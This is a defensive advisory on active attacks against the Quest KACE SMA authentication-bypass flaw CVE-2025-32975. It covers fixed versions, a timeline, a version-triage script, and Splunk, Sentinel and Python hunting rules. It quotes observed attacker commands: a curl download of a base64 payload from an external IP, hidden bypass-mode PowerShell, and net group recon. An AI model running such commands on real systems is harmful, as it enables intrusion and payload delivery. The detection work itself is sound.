Executive Summary
Since March 2026, the critical CVE-2025-32975 vulnerability in Quest KACE Systems Management Appliance (SMA) has been linked to active attacks against unpatched, internet-exposed systems. The flaw carries a CVSS score of 10.0 and allows attackers to bypass authentication and impersonate legitimate users, creating a direct path to full administrative control.
That matters because KACE SMA is not a peripheral asset. It is an endpoint management platform with privileged visibility into enterprise systems. In activity observed by Arctic Wolf, attackers used the flaw to seize admin access, fetch payloads from external infrastructure, create new accounts, harvest credentials, and move deeper into victim environments. For defenders, this is a patch-now issue with clear lateral movement and command-and-control risk.
The flaw: Authentication bypass
CVE-2025-32975 is a critical-severity vulnerability (CVSS 10.0) in the SSO authentication handling mechanism of Quest KACE SMA. The issue allows attackers to impersonate legitimate users without valid credentials, which can lead to full administrative takeover.
How the exploit works
- Reach an exposed SMA instance over the network.
- Abuse the SSO authentication path to bypass normal login requirements.
- Impersonate a valid user or administrator and obtain privileged access.
- Execute follow-on actions such as remote commands, account creation, and payload retrieval.
- Establish persistence and expand access through credential theft or remote administration channels.
A simplified representation of the post-compromise activity observed by Arctic Wolf looks like this:
```bash
curl hxxp://216.126.225.156/<payload> | base64 -d > payload.bin
runkbot.exe <arguments>
powershell -ExecutionPolicy Bypass -WindowStyle Hidden -File C:\temp\Enable-UpdateServices.ps1
```
The patch stream from Quest addressed this issue in 13.0.385, 13.1.81, 13.2.183, 14.0.341 (Patch 5), and 14.1.101 (Patch 4). The problem is no longer theoretical, however: exploitation is being observed on systems that remain unpatched and publicly reachable.
What is the CVE-2025-32975 exploitation timeline?
| Date | Event | Status |
|---|---|---|
| May 27, 2025 | Quest publishes advisory and fixed versions for CVE-2025-32975 and related flaws | ✅ Patch available |
| June 2025 | Public references for the vulnerability begin appearing in disclosure and tracking sources | 📢 Public disclosure |
| Week of March 9, 2026 | Arctic Wolf observes malicious activity consistent with exploitation in customer environments | ⚠️ Initial compromise |
| March 23, 2026 | Public reporting highlights ongoing attacks against unpatched internet-exposed SMA systems | 🔴 Active exploitation |
Why this matters: endpoint management as a high-value target
Key challenges
- Administrative blast radius: An attacker who wins admin access to an endpoint management appliance can affect a large number of systems from a single control plane.
- Exposure gap after patch release: The flaw was patched in 2025, but exposed systems remained reachable long enough for attackers to exploit them in 2026.
- Post-compromise escalation: Observed activity included new admin creation, Mimikatz use, and access to backup and directory infrastructure, which raises the risk of broader domain compromise and ransomware staging.
Critical risk: A compromise of KACE SMA is not just a web admin issue. It can become an account takeover, privileged management plane compromise, and enterprise-wide incident response event.
Defensive posture: immediate actions
🔴 Patch every exposed KACE SMA appliance
Update any affected instance to one of Quest’s fixed builds immediately:
- 13.0.385 or later
- 13.1.81 or later
- 13.2.183 or later
- 14.0.341 (Patch 5) or later
- 14.1.101 (Patch 4) or later
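The fixed builds above are per release branch, so "is this appliance patched?" is a branch-aware comparison, not a plain version sort. The following is an added example (not Quest tooling) that triages a constructed inventory against those builds and puts internet-exposed, still-vulnerable appliances first. It assumes the appliance reports its version as MAJOR.MINOR.BUILD; the "Patch N" label is treated as informational and not compared. Branches the advisory does not list are flagged for manual review rather than assumed safe.

```python
"""Triage a KACE SMA inventory against the fixed builds Quest published for
CVE-2025-32975. Added example, not Quest tooling. Assumes versions are
reported as MAJOR.MINOR.BUILD (e.g. 14.0.338)."""

# Fixed build per release branch, as listed in the advisory text.
FIXED_BUILDS = {
    (13, 0): 385,
    (13, 1): 81,
    (13, 2): 183,
    (14, 0): 341,   # 14.0.341 (Patch 5)
    (14, 1): 101,   # 14.1.101 (Patch 4)
}

PRIORITY_ORDER = {"P1": 0, "P2": 1, "review": 2, "ok": 3}


def parse_version(version: str) -> tuple[int, int, int]:
    """Return (major, minor, build); raise ValueError on unexpected input."""
    parts = version.strip().split(".")
    if len(parts) < 3 or not all(p.isdigit() for p in parts[:3]):
        raise ValueError(f"unexpected KACE SMA version format: {version!r}")
    major, minor, build = (int(p) for p in parts[:3])
    return major, minor, build


def assess(version: str) -> str:
    """'fixed', 'vulnerable', or 'unknown-branch' (branch not in the advisory)."""
    major, minor, build = parse_version(version)
    fixed = FIXED_BUILDS.get((major, minor))
    if fixed is None:
        return "unknown-branch"
    return "fixed" if build >= fixed else "vulnerable"


def triage(inventory):
    """inventory: iterable of (hostname, version, internet_exposed).
    Returns rows sorted so exposed, vulnerable appliances come first."""
    rows = []
    for hostname, version, exposed in inventory:
        status = assess(version)
        if status == "vulnerable":
            priority = "P1" if exposed else "P2"
        elif status == "unknown-branch":
            priority = "review"
        else:
            priority = "ok"
        rows.append({"host": hostname, "version": version, "exposed": exposed,
                     "status": status, "priority": priority})
    rows.sort(key=lambda r: PRIORITY_ORDER[r["priority"]])
    return rows


# Constructed sample inventory: hostnames, versions and exposure are made up.
SAMPLE_INVENTORY = [
    ("kace-sma-01", "14.0.338", True),
    ("kace-sma-02", "14.1.101", False),
    ("kace-sma-03", "13.2.180", False),
    ("kace-sma-04", "12.1.169", True),
]

if __name__ == "__main__":
    for row in triage(SAMPLE_INVENTORY):
        print(f"{row['priority']:<8}{row['host']:<14}{row['version']:<10}"
              f"exposed={row['exposed']!s:<6}{row['status']}")
```

Feed it the output of whatever asset inventory holds your appliance versions and exposure flags; the P1 rows are the ones to patch and pull off the internet today, and the "review" rows are branches the advisory does not name, which should be confirmed against Quest's guidance rather than assumed unaffected.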
🔴 Remove public exposure
If remote access is required, place SMA behind a VPN, hardened reverse access path, or tightly restricted firewall policy. Public internet exposure materially increases risk here.
👥 Review privileged access and new accounts
- Audit recent administrative account creation on SMA.
- Review changes tied to runkbot.exe activity.
- Reset credentials and rotate tokens if administrative access may have been abused.
🔍 Hunt for execution, persistence, and credential theft
Look for:
- curl downloads from 216.126.225.156
- Base64-decoded payload staging
- PowerShell launched with hidden or bypass flags
- Mimikatz or lookalike binaries such as asd.exe
- RDP access to backup systems, domain controllers, or identity infrastructure
Splunk example:
```spl
index=windows OR index=edr ("runkbot.exe" OR "mimikatz" OR "asd.exe" OR "Enable-UpdateServices.ps1" OR "216.126.225.156")
| stats count min(_time) as firstSeen max(_time) as lastSeen by host, user, process_name, parent_process_name, dest_ip, command_line
```
Microsoft Sentinel example:
```kql
DeviceProcessEvents
| where ProcessCommandLine has_any ("runkbot.exe", "mimikatz", "Enable-UpdateServices.ps1", "216.126.225.156")
| project Timestamp, DeviceName, AccountName, FileName, ProcessCommandLine, InitiatingProcessFileName
| order by Timestamp desc
```
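The Splunk and Sentinel searches above match the literal indicators only. The following added example (not Arctic Wolf's or Quest's code) expresses the same hunt, plus the behavioural items from the list, as rules run over a constructed set of process events: the literal IoCs, outbound contact with 216.126.225.156, base64 decoding to a file, PowerShell launched with bypass or hidden flags (full names and their short forms -ep and -w), and net user/group/time reconnaissance. It then summarises per host with count, first seen and last seen, mirroring the Splunk stats clause. Field names, hostnames and timestamps are assumptions; the URL is defanged as in the advisory.

```python
"""Rule-based hunt for the post-compromise behaviours described in the
advisory, run over constructed process events. Added example; not vendor
tooling. Event field names are an assumption."""
import re
from collections import defaultdict

IOC_IP = "216.126.225.156"
IOC_STRINGS = ("runkbot.exe", "mimikatz", "asd.exe",
               "enable-updateservices.ps1", IOC_IP)

# -ExecutionPolicy Bypass / -WindowStyle Hidden and their short forms -ep / -w
PS_HIDDEN_BYPASS = re.compile(
    r"-(?:executionpolicy|ep)\s+bypass|-(?:windowstyle|w)\s+hidden", re.I)
BASE64_STAGING = re.compile(r"base64\s+(?:-d|--decode)\b", re.I)
RECON_NET = re.compile(r"\bnet(?:\.exe)?\s+(?:user|group|time)\b", re.I)


def classify(ev):
    """Return the names of every rule the event trips, in a fixed order."""
    haystack = " ".join((ev["parent"], ev["process"], ev["command_line"])).lower()
    cmd = ev["command_line"]
    hits = []
    if any(s in haystack for s in IOC_STRINGS):
        hits.append("ioc_string")
    if ev.get("dest_ip") == IOC_IP or IOC_IP in cmd:
        hits.append("c2_ip")
    if BASE64_STAGING.search(cmd):
        hits.append("base64_staging")
    if PS_HIDDEN_BYPASS.search(cmd):
        hits.append("ps_hidden_bypass")
    if RECON_NET.search(cmd):
        hits.append("recon_net")
    return hits


def hunt(events):
    """Per-host summary of hits: count, first/last seen, rules tripped.
    ISO-8601 UTC timestamps sort lexicographically, so min/max on the
    strings is safe."""
    summary = defaultdict(lambda: {"count": 0, "first_seen": None,
                                   "last_seen": None, "rules": set()})
    for ev in events:
        rules = classify(ev)
        if not rules:
            continue
        s = summary[ev["host"]]
        s["count"] += 1
        s["first_seen"] = min(filter(None, (s["first_seen"], ev["ts"])))
        s["last_seen"] = max(filter(None, (s["last_seen"], ev["ts"])))
        s["rules"].update(rules)
    return {h: {**s, "rules": sorted(s["rules"])} for h, s in summary.items()}


# Constructed sample events (hostnames, users and times are made up).
EVENTS = [
    {"ts": "2026-03-10T02:14:05Z", "host": "WS-FIN-07", "user": "svc_kace",
     "parent": "runkbot.exe", "process": "cmd.exe", "dest_ip": IOC_IP,
     "command_line": r"cmd.exe /c curl hxxp://216.126.225.156/update.bin | base64 -d > C:\temp\payload.bin"},
    {"ts": "2026-03-10T02:14:40Z", "host": "WS-FIN-07", "user": "svc_kace",
     "parent": "runkbot.exe", "process": "powershell.exe", "dest_ip": "",
     "command_line": r"powershell -ExecutionPolicy Bypass -WindowStyle Hidden -File C:\temp\Enable-UpdateServices.ps1"},
    {"ts": "2026-03-10T02:16:12Z", "host": "WS-FIN-07", "user": "svc_kace",
     "parent": "cmd.exe", "process": "net.exe", "dest_ip": "",
     "command_line": 'net group "Domain Admins" /domain'},
    {"ts": "2026-03-10T03:02:51Z", "host": "DC-01", "user": "svc_kace",
     "parent": "cmd.exe", "process": "asd.exe", "dest_ip": "",
     "command_line": r"C:\temp\asd.exe"},
    {"ts": "2026-03-10T09:00:00Z", "host": "WS-HR-02", "user": "jdoe",
     "parent": "explorer.exe", "process": "powershell.exe", "dest_ip": "",
     "command_line": r"powershell.exe -NoProfile -File C:\scripts\report.ps1"},
    {"ts": "2026-03-10T09:05:00Z", "host": "WS-HR-02", "user": "jdoe",
     "parent": "cmd.exe", "process": "curl.exe", "dest_ip": "10.0.0.5",
     "command_line": "curl.exe -sS http://10.0.0.5/health"},
]

if __name__ == "__main__":
    for host, s in sorted(hunt(EVENTS).items()):
        print(f"{host:<10} count={s['count']} first={s['first_seen']} "
              f"last={s['last_seen']} rules={','.join(s['rules'])}")
```

The benign rows (a signed report script, a health check against an internal address) show why the behavioural rules are scoped the way they are: PowerShell alone is not a hit, only PowerShell with bypass or hidden flags is, and curl alone is not a hit, only curl to the listed address or piped through base64 decoding is. Tune the regexes to your own telemetry format before relying on them.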
🛡️ Segment and validate backup paths
Because observed intrusions reached backup infrastructure and domain controllers, validate admin paths into Veeam, Veritas, AD, and similar crown-jewel services. Restrict east-west access where possible.
Indicators and observed attacker behavior
Arctic Wolf reported activity consistent with the following pattern:
- remote command execution via KACE functionality
- payload retrieval from 216.126.225.156
- additional administrator creation via runkbot.exe
- PowerShell execution with hidden or bypassed settings
- Windows Registry modifications for persistence or configuration changes
- credential theft using Mimikatz
- reconnaissance with net user, net group, and net time
- RDP access to backup infrastructure and domain controllers
This combination suggests operators were not stopping at initial access. They were using the appliance as a springboard for persistence, privilege expansion, and deeper operational control.
Bottom line
CVE-2025-32975 is a maximum-severity authentication bypass in a privileged enterprise platform, and attackers are already exploiting unpatched KACE SMA systems in the wild.
Key takeaways
✅ Patch status is not protection by itself — systems still exposed and unpatched remain viable targets long after disclosure.
✅ KACE SMA should be treated as high-impact infrastructure — compromise of an endpoint management appliance can cascade into credentials, backups, and domain administration.
✅ Exposure reduction matters — if an SMA instance is reachable from the public internet, the safest assumption is that it deserves immediate validation and remediation.
For your clients and users
Patch affected KACE SMA versions immediately, remove public exposure, and investigate for post-compromise activity if the appliance was internet-facing. Delays here increase the chance of administrative takeover and follow-on enterprise compromise.
Frequently Asked Questions
What is CVE-2025-32975?
CVE-2025-32975 is a critical authentication bypass vulnerability in Quest KACE SMA. It affects the product’s SSO authentication handling and can let attackers impersonate legitimate users without valid credentials.
Is CVE-2025-32975 being exploited?
Yes. Arctic Wolf reported malicious activity observed from the week of March 9, 2026 that is consistent with exploitation of CVE-2025-32975 on unpatched, internet-exposed KACE SMA systems.
Which versions are affected?
Affected versions include 13.0.x before 13.0.385, 13.1.x before 13.1.81, 13.2.x before 13.2.183, 14.0.x before 14.0.341 (Patch 5), and 14.1.x before 14.1.101 (Patch 4).
What should defenders do first?
Patch to a fixed version, remove direct internet exposure, review privileged account activity, and hunt for known post-compromise behaviors such as runkbot.exe, hidden PowerShell, Mimikatz, and suspicious outbound retrieval activity.